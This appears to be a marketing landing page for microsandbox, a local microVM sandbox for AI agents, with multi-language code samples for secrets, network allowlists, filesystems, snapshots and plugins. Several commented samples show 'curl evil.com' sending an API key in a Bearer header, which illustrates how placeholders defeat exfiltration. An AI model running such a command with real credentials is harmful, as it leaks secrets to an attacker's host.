YC X26  Launching soon

Every agent deserves
its own machine

Run lightweight microVMs locally on your machine with programmable networking, custom filesystems, and secrets that never leave the host.

You're on the list. We'll be in touch soon.
macOS Windows Linux
Terminal
$ msb pull ghcr.io/pytorch/pytorch:2.3
pulled pytorch:2.3 from ghcr.io 3.2s

$ msb run python:3.12 --name dev
created dev python:3.12 cpu=2 mem=512Mi 187ms

$ msb exec dev -- python -c "print('hello')"
hello

$ msb ps
NAME IMAGE STATUS CPU MEM
dev python:3.12 running 2 512Mi

$ msb stop dev
stopped dev 12ms
What Makes It Different

Local microVMs,
not remote containers.

Every sandbox runs as a real microVM on your machine. Networking, filesystems, and secrets are programmable from the host. The guest never knows.

Secrets

Secrets that can't leak

The guest never sees real credentials. microsandbox injects random placeholders and substitutes real values at the network layer, only for verified TLS connections to allowed hosts.

DNS rebinding protection, cloud metadata blocking, and DNS-to-IP binding all activate automatically when secrets are configured. Exfiltration via DNS tunneling, SSRF, or TLS downgrade is blocked by default.
let sb = Sandbox::builder("agent")
  .image("python:3.12")
  .secret_env("OPENAI_API_KEY", key, "api.openai.com")
  .create().await?;

// Inside the sandbox:
// echo $OPENAI_API_KEY → msb_placeholder_a7f3...
//
// curl api.openai.com -H "Bearer $OPENAI_API_KEY"
// → real key injected (TLS verified, host matched)
//
// curl evil.com -H "Bearer $OPENAI_API_KEY"
// → placeholder sent, real key never leaves host
sb = await Sandbox.create("agent", image="python:3.12",
  secrets={"OPENAI_API_KEY": (key, "api.openai.com")}
)

# Inside the sandbox:
# echo $OPENAI_API_KEY → msb_placeholder_a7f3...
#
# curl api.openai.com -H "Bearer $OPENAI_API_KEY"
# → real key injected (TLS verified, host matched)
#
# curl evil.com -H "Bearer $OPENAI_API_KEY"
# → placeholder sent, real key never leaves host
const sb = await Sandbox.create("agent", {
  image: "python:3.12",
  secrets: { "OPENAI_API_KEY": [key, "api.openai.com"] }
});

// Inside the sandbox:
// echo $OPENAI_API_KEY → msb_placeholder_a7f3...
//
// curl api.openai.com -H "Bearer $OPENAI_API_KEY"
// → real key injected (TLS verified, host matched)
//
// curl evil.com -H "Bearer $OPENAI_API_KEY"
// → placeholder sent, real key never leaves host
sb, err := msb.NewSandbox("agent",
  msb.Image("python:3.12"),
  msb.SecretEnv("OPENAI_API_KEY", key, "api.openai.com"),
)

// Inside the sandbox:
// echo $OPENAI_API_KEY → msb_placeholder_a7f3...
//
// curl api.openai.com -H "Bearer $OPENAI_API_KEY"
// → real key injected (TLS verified, host matched)
//
// curl evil.com -H "Bearer $OPENAI_API_KEY"
// → placeholder sent, real key never leaves host
resource "microsandbox_sandbox" "agent" {
  name = "agent"
  image = "python:3.12"

  secret {
    env_name = "OPENAI_API_KEY"
    value = var.openai_api_key
    allowed_host = "api.openai.com"
  }
}

# Guest only sees placeholder.
# Real key injected at network layer
# for verified TLS to api.openai.com only.
$ msb run python:3.12 --name agent \
  --secret-env OPENAI_API_KEY=@env:OPENAI_KEY:api.openai.com

$ msb exec agent -- echo \$OPENAI_API_KEY
  msb_placeholder_a7f3...

# Real key injected only for verified
# TLS connections to api.openai.com
Networking

Programmable network layer

Inspect DNS queries, analyze HTTP traffic, drop packets at the IP level, or build custom data loss prevention. The guest sees a normal network stack.

Implement the NetBackend trait for full frame-level control, or use built-in hooks for DNS, HTTP, and TLS. Allowlist domains, block CIDR ranges, intercept TLS with auto-generated certs.
let sb = Sandbox::builder("worker")
  .image("node:20")
  .network(|n| n
    .allow(["api.openai.com", "*.stripe.com"])
    .on_dns(|q| { log("dns: {}", q.name); DnsAction::Allow })
    .on_http(|req| {
      if contains_pii(&req.body) {
        return HttpAction::Block("DLP: PII detected");
      }
      HttpAction::Forward(req)
    })
    .block_cidr("169.254.0.0/16") // cloud metadata
    .block_cidr("10.0.0.0/8")
  ).create().await?;
sb = await Sandbox.create("worker", image="node:20",
  network=Network(
    allow=["api.openai.com", "*.stripe.com"],
    on_dns=lambda q: (log(f"dns: {q.name}"), DnsAction.ALLOW),
    on_http=lambda req:
      HttpAction.block("DLP: PII") if contains_pii(req.body)
      else HttpAction.forward(req),
    block_cidr=["169.254.0.0/16", "10.0.0.0/8"],
  )
)
const sb = await Sandbox.create("worker", {
  image: "node:20",
  network: {
    allow: ["api.openai.com", "*.stripe.com"],
    onDns: (q) => { log(`dns: ${q.name}`); return "allow"; },
    onHttp: (req) =>
      containsPii(req.body) ? block("DLP: PII") : forward(req),
    blockCidr: ["169.254.0.0/16", "10.0.0.0/8"],
  }
});
sb, _ := msb.NewSandbox("worker",
  msb.Image("node:20"),
  msb.Network(
    msb.Allow("api.openai.com", "*.stripe.com"),
    msb.OnDns(func(q DnsQuery) DnsAction {
      log("dns: %s", q.Name)
      return DnsAllow
    }),
    msb.BlockCidr("169.254.0.0/16", "10.0.0.0/8"),
  ),
)
resource "microsandbox_sandbox" "worker" {
  name = "worker"
  image = "node:20"

  network {
    allow = ["api.openai.com", "*.stripe.com"]
    block_cidr = ["169.254.0.0/16", "10.0.0.0/8"]
  }
}

# DNS/HTTP hooks configured via plugin
# resources for full traffic inspection.
$ msb run node:20 --name worker \
  --net-allow api.openai.com,*.stripe.com \
  --net-block-cidr 169.254.0.0/16,10.0.0.0/8

# DNS/HTTP inspection hooks require
# a plugin or the SDK.
# CIDR blocking and domain allowlists
# work directly from the CLI.
Filesystems

Extensible filesystem backends

Mount custom filesystem implementations into any sandbox. Intercept reads and writes, build virtual filesystems, or proxy to remote storage, all through a single trait.

The DynFileSystem trait provides ~40 POSIX-compatible methods. Built-in backends include passthrough, overlay, in-memory, and ProxyFs for hooking into any other backend. Zero-copy I/O.
struct AuditFs { inner: PassthroughFs }

impl DynFileSystem for AuditFs {
  fn open(&self, ctx: Context, ino: u64, flags: u32) -> Result<u64> {
    log("open ino={ino} pid={}", ctx.pid);
    self.inner.open(ctx, ino, flags)
  }
  // read, write, lookup, mkdir, unlink ...
}

let sb = Sandbox::builder("app")
  .image("python:3.12")
  .volume("/data", |v| v.backend(AuditFs::new("./data")?))
  .volume("/cache", |v| v.backend(MemFs::new()))
  .create().await?;
class AuditFs(FileSystemBackend):
  def open(self, ctx, ino, flags):
    log(f"open ino={ino} pid={ctx.pid}")
    return self.inner.open(ctx, ino, flags)
  # read, write, lookup, mkdir, unlink ...

sb = await Sandbox.create("app", image="python:3.12",
  volumes={
    "/data": AuditFs("./data"),
    "/cache": MemFs(),
  }
)
class AuditFs extends FileSystemBackend {
  open(ctx, ino, flags) {
    log(`open ino=${ino} pid=${ctx.pid}`);
    return this.inner.open(ctx, ino, flags);
  }
  // read, write, lookup, mkdir, unlink ...
}

const sb = await Sandbox.create("app", {
  image: "python:3.12",
  volumes: {
    "/data": new AuditFs("./data"),
    "/cache": new MemFs(),
  }
});
type AuditFs struct{ inner PassthroughFs }

func (a *AuditFs) Open(ctx Context, ino uint64, flags uint32) (uint64, error) {
  log("open ino=%d pid=%d", ino, ctx.Pid)
  return a.inner.Open(ctx, ino, flags)
}

sb, _ := msb.NewSandbox("app",
  msb.Image("python:3.12"),
  msb.Volume("/data", &AuditFs{NewPassthrough("./data")}),
  msb.Volume("/cache", msb.NewMemFs()),
)
resource "microsandbox_sandbox" "app" {
  name = "app"
  image = "python:3.12"

  volume {
    mount_path = "/data"
    backend = "passthrough"
    source = "./data"
  }

  volume {
    mount_path = "/cache"
    backend = "memory"
  }
}
$ msb run python:3.12 --name app \
  --volume ./data:/data \
  --volume-mem /cache

# Custom filesystem backends (AuditFs, etc.)
# require the SDK or a filesystem plugin.
# Built-in backends: passthrough, memory,
# overlay available from the CLI.
Snapshots

Snapshot, fork, restore

Save full VM state (memory, CPU registers, filesystem) and fork hundreds of identical sandboxes from one baseline. Sub-millisecond restore, no re-boot.

Install dependencies once, snapshot, then fork workers on demand. Each fork gets copy-on-write filesystem overlay. Restore with overrides to change memory, CPU, or environment.
let sb = Sandbox::builder("base")
  .image("python:3.12")
  .create().await?;
sb.exec("pip install numpy pandas torch").await?;

let snap = sb.snapshot().await?;
snap.save_named("ml-ready").await?;

// Fork 100 workers from the same baseline
let workers = futures::try_join_all((0..100).map(|i| {
  snap.restore_with(format!("w-{i}"), |r| r.env("WORKER_ID", &i.to_string()))
})).await?;
sb = await Sandbox.create("base", image="python:3.12")
await sb.exec("pip install numpy pandas torch")

snap = await sb.snapshot("ml-ready")

# Fork 100 workers from the same baseline
workers = await asyncio.gather(*[
  snap.restore(f"w-{i}", env={"WORKER_ID": str(i)})
  for i in range(100)
])
const sb = await Sandbox.create("base", { image: "python:3.12" });
await sb.exec("pip install numpy pandas torch");

const snap = await sb.snapshot("ml-ready");

// Fork 100 workers from the same baseline
const workers = await Promise.all(
  Array.from({ length: 100 }, (_, i) =>
    snap.restore(`w-${i}`, { env: { WORKER_ID: String(i) } })
  )
);
sb, _ := msb.NewSandbox("base", msb.Image("python:3.12"))
sb.Exec(ctx, "pip install numpy pandas torch")

snap, _ := sb.Snapshot(ctx, "ml-ready")

// Fork 100 workers from the same baseline
var g errgroup.Group
for i := range 100 {
  g.Go(func() error {
    _, err := snap.Restore(ctx, fmt.Sprintf("w-%d", i),
      msb.Env("WORKER_ID", strconv.Itoa(i)))
    return err
  })
}
resource "microsandbox_sandbox" "base" {
  name = "base"
  image = "python:3.12"
}

resource "microsandbox_snapshot" "ml_ready" {
  sandbox = microsandbox_sandbox.base.name
  name = "ml-ready"
}

resource "microsandbox_sandbox" "worker" {
  count = 100
  name = "w-${count.index}"
  from_snapshot = microsandbox_snapshot.ml_ready.name
  env = { WORKER_ID = count.index }
}
$ msb run python:3.12 --name base
$ msb exec base -- pip install numpy pandas torch

$ msb snapshot base --name ml-ready

# Fork 100 workers from the same baseline
$ for i in $(seq 0 99); do
    msb restore ml-ready --name w-$i \
      --env WORKER_ID=$i &
  done
Plugins

Composable plugin system

Extend sandbox behavior with in-process Rust plugins or out-of-process plugins in any language. Hook into lifecycle, exec, filesystem, or network events.

Plugins compose. Stack an audit logger, a rate limiter, and a custom network monitor on the same sandbox. Browse and install from the plugin registry, or publish your own network, filesystem, and lifecycle plugins for others to use.
let sb = Sandbox::builder("app")
  .image("python:3.12")
  .plugin(AuditLog::new("/var/log/audit"))
  .plugin(RateLimiter::new(100)) // 100 exec/s
  .plugin_process("node ./plugins/monitor.js")
  .plugin_process("python ./plugins/dlp.py")
  .create().await?;

// Hooks: lifecycle, exec, events,
// filesystem, network, agent extensions
sb = await Sandbox.create("app", image="python:3.12",
  plugins=[
    AuditLog("/var/log/audit"),
    RateLimiter(max_exec_per_sec=100),
  ],
  plugin_processes=[
    "node ./plugins/monitor.js",
    "python ./plugins/dlp.py",
  ]
)

# Hooks: lifecycle, exec, events,
# filesystem, network, agent extensions
const sb = await Sandbox.create("app", {
  image: "python:3.12",
  plugins: [
    new AuditLog("/var/log/audit"),
    new RateLimiter({ maxExecPerSec: 100 }),
  ],
  pluginProcesses: [
    "node ./plugins/monitor.js",
    "python ./plugins/dlp.py",
  ]
});

// Hooks: lifecycle, exec, events,
// filesystem, network, agent extensions
sb, _ := msb.NewSandbox("app",
  msb.Image("python:3.12"),
  msb.Plugin(NewAuditLog("/var/log/audit")),
  msb.Plugin(NewRateLimiter(100)),
  msb.PluginProcess("node ./plugins/monitor.js"),
  msb.PluginProcess("python ./plugins/dlp.py"),
)

// Hooks: lifecycle, exec, events,
// filesystem, network, agent extensions
resource "microsandbox_sandbox" "app" {
  name = "app"
  image = "python:3.12"

  plugin {
    name = "audit-log"
    log_dir = "/var/log/audit"
  }

  plugin {
    name = "rate-limiter"
    max_exec_per_s = 100
  }

  plugin_process = [
    "node ./plugins/monitor.js",
    "python ./plugins/dlp.py",
  ]
}
$ msb run python:3.12 --name app \
  --plugin audit-log --plugin rate-limiter \
  --plugin-process "node ./plugins/monitor.js" \
  --plugin-process "python ./plugins/dlp.py"

# Browse the plugin registry
$ msb plugin search network
$ msb plugin install msb-dlp
Multi-Agent

Spawn sandboxes from sandboxes

Code running inside a sandbox can spawn peer sandboxes alongside itself. Perfect for multi-agent systems where each agent gets its own isolated environment. Fails safely if not running inside a microsandbox.

Peer sandboxes inherit nothing by default. Each gets its own network, filesystem, and secrets. The orchestrator coordinates via the SDK, not shared state.
// Running inside a microsandbox
let rt = Sandbox::current_runtime().await?;

// Spawn peer sandboxes (isolated, same level)
let researcher = rt.start("researcher")
  .image("python:3.12")
  .secret_env("SERP_KEY", key, "serpapi.com")
  .create().await?;

let coder = rt.start("coder")
  .image("node:20")
  .network(|n| n.deny_all()) // air-gapped
  .create().await?;
# Running inside a microsandbox
rt = await Sandbox.current_runtime()

# Spawn peer sandboxes (isolated, same level)
researcher = await rt.start("researcher",
  image="python:3.12",
  secrets={"SERP_KEY": (key, "serpapi.com")},
)

coder = await rt.start("coder",
  image="node:20",
  network=Network(deny_all=True), # air-gapped
)
// Running inside a microsandbox
const rt = await Sandbox.currentRuntime();

// Spawn peer sandboxes (isolated, same level)
const researcher = await rt.start("researcher", {
  image: "python:3.12",
  secrets: { "SERP_KEY": [key, "serpapi.com"] },
});

const coder = await rt.start("coder", {
  image: "node:20",
  network: { denyAll: true }, // air-gapped
});
// Running inside a microsandbox
rt, _ := msb.CurrentRuntime(ctx)

// Spawn peer sandboxes (isolated, same level)
researcher, _ := rt.Start("researcher",
  msb.Image("python:3.12"),
  msb.SecretEnv("SERP_KEY", key, "serpapi.com"),
)

coder, _ := rt.Start("coder",
  msb.Image("node:20"),
  msb.Network(msb.DenyAll()), // air-gapped
)
# Orchestrator sandbox can spawn peers
resource "microsandbox_sandbox" "orchestrator" {
  name = "orchestrator"
  image = "python:3.12"
}

resource "microsandbox_sandbox" "researcher" {
  name = "researcher"
  image = "python:3.12"
  spawned_by = microsandbox_sandbox.orchestrator.name

  secret {
    env_name = "SERP_KEY"
    allowed_host = "serpapi.com"
  }
}

resource "microsandbox_sandbox" "coder" {
  name = "coder"
  image = "node:20"
  spawned_by = microsandbox_sandbox.orchestrator.name
  network { deny_all = true }
}
# From inside a running microsandbox:
$ msb start researcher \
  --image python:3.12 \
  --secret-env SERP_KEY=@env:SERP_KEY:serpapi.com

$ msb start coder \
  --image node:20 \
  --net-deny-all

# Fails if not running inside a microsandbox
Cloud Sync

Local sandboxes, resume anywhere

Sync sandbox filesystems to the cloud. Pick up exactly where you left off from any machine. Same files, same environment.

Starting with filesystem replication. Memory snapshotting and auto-sync coming next. Start on your laptop, continue on a remote machine, pull back to local. No rebuild, no re-setup.
let sb = Sandbox::builder("ml-project")
  .image("python:3.12")
  .create().await?;
sb.exec("pip install torch").await?;

// Push filesystem state to the cloud
sb.push().await?;

// On another machine: pull and resume
let sb = Sandbox::pull("ml-project").await?;
sb.start().await?;
sb = await Sandbox.create("ml-project", image="python:3.12")
await sb.exec("pip install torch")

# Push filesystem state to the cloud
await sb.push()

# On another machine: pull and resume
sb = await Sandbox.pull("ml-project")
await sb.start()
const sb = await Sandbox.create("ml-project", {
  image: "python:3.12",
});
await sb.exec("pip install torch");

// Push filesystem state to the cloud
await sb.push();

// On another machine: pull and resume
const pulled = await Sandbox.pull("ml-project");
await pulled.start();
sb, _ := msb.NewSandbox("ml-project",
  msb.Image("python:3.12"),
)
sb.Exec(ctx, "pip install torch")

// Push filesystem state to the cloud
sb.Push(ctx)

// On another machine: pull and resume
sb, _ = msb.Pull(ctx, "ml-project")
sb.Start(ctx)
resource "microsandbox_sandbox" "ml_project" {
  name = "ml-project"
  image = "python:3.12"

  sync {
    enabled = true
  }
}

# Filesystem state is synced to the cloud.
# Pull from any machine with:
# msb pull ml-project
# msb start ml-project
$ msb run python:3.12 --name ml-project
$ msb exec ml-project -- pip install torch

# Push filesystem state to the cloud
$ msb push ml-project

# On another machine: pull and resume
$ msb pull ml-project
$ msb start ml-project
Projects

Declarative multi-sandbox projects

Define your entire environment in a Sandboxfile. Per-sandbox secrets, network policies, dependency ordering, and scripts. Think Compose, but for microVMs.

Restore sandboxes from snapshots instead of booting fresh. Share volumes across sandboxes. Pull from any OCI-compatible registry. Run with msb project up -d.
Sandboxfile
name: my-project

volumes:
  data: { size: 10G }

sandboxes:
  api:
    image: python:3.11
    volumes: [./src:/app, data:/data]
    ports: [8000:8000]
    secrets: [OPENAI_API_KEY]
    network:
      allow: [api.openai.com]
      dns: { rebind_protection: strict }
    scripts:
      start: python app.py
      test: pytest

  worker:
    from_snapshot: ml-ready
    memory: 2G
    depends_on: [api]
Why Local-First

Your sandboxes should run
on your machine.

No round-trips to a remote API. Real VM isolation, programmable from the host, at container speed.

microsandbox
Remote sandboxes
Runs on
Your machine
Vendor cloud
Latency
Local (<1ms)
Network round-trip
Isolation
MicroVM (hardware)
Varies (containers/VMs)
Network control
Programmable per-sandbox
Limited / none
Filesystem
Custom backends (trait)
Fixed / opaque
Secrets
Host-side substitution
Sent to vendor
Offline
Works offline
Requires internet
Cost
Free (cloud sync: fair usage)
Per-minute billing
Plugins
Extensible (any language)
Vendor API only
Platforms
macOS, Windows, Linux
Browser / API
And Also

The details matter

<200ms Boot

libkrun microVMs, not QEMU. Pre-patched kernel as a shared library. Zero-copy mmap.

DNS Rebinding Protection

Blocks private IPs in DNS responses. Per-connection IP pinning. Cloud metadata blocked.

TLS Interception

Auto-generated certs, per-domain bypass. Inspect HTTPS without guest awareness.

Any OCI Registry

Pull from Docker Hub, GHCR, ECR, GCR, or any OCI-compatible registry. Your existing images work.

No Daemon

Embeds the runtime directly. No root process, no socket, no background service.

Cross-Platform

Native on macOS, Windows, and Linux. Same CLI, same SDKs, same Sandboxfile everywhere.

Get early access

Local-first sandboxes are coming. Join the waitlist to get early access.

You're on the list. We'll be in touch soon.

Want to talk first? Schedule a call